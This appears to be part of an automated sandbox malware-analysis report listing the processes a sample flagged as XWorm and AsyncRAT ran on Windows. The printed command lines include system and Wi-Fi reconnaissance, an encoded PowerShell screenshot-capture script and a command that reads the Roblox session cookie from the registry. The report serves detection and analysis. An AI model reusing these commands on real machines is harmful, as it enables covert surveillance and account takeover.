Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	13:01:18
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	13:01:18
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	13:01:18
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	13:01:18
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	13:01:18
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	13:01:18
Start date:	13/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff7d0a10000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	13:01:18
Start date:	13/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff715bf0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	13:01:18
Start date:	13/10/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff628ea0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	13:01:18
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	13:01:19
Start date:	13/10/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff743c80000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	13:01:19
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\word.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\word.exe
Imagebase:	0xd10000
File size:	68'096 bytes
MD5 hash:	8D8BC4B4831CCCE11284D512630749C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\word.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\word.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\word.exe, Author: ditekSHen
Antivirus matches:	Detection: 84%, ReversingLabs Detection: 80%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	13:01:20
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	13:01:20
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	13:01:20
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	13:01:22
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8748, Parent PID: 8740

General

Target ID:	53
Start time:	13:01:22
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	13:01:22
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	13:01:22
Start date:	13/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline"
Imagebase:	0x7ff7aee60000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	13:01:22
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	13:01:23
Start date:	13/10/2024
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff7ed9c0000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	13:01:23
Start date:	13/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff715bf0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	13:01:23
Start date:	13/10/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADCB.tmp" "c:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP"
Imagebase:	0x7ff63b710000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	13:01:25
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 9188, Parent PID: 9172

General

Target ID:	64
Start time:	13:01:25
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	13:01:25
Start date:	13/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff715bf0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	13:01:25
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7916, Parent PID: 7912

General

Target ID:	67
Start time:	13:01:26
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	13:01:26
Start date:	13/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff715bf0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	13:01:26
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4564, Parent PID: 8328

General

Target ID:	70
Start time:	13:01:26
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	13:01:26
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	13:01:26
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	13:01:26
Start date:	13/10/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff715bf0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	13:01:27
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	13:01:27
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6b3e20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8320, Parent PID: 8144

General

Target ID:	76
Start time:	13:01:27
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

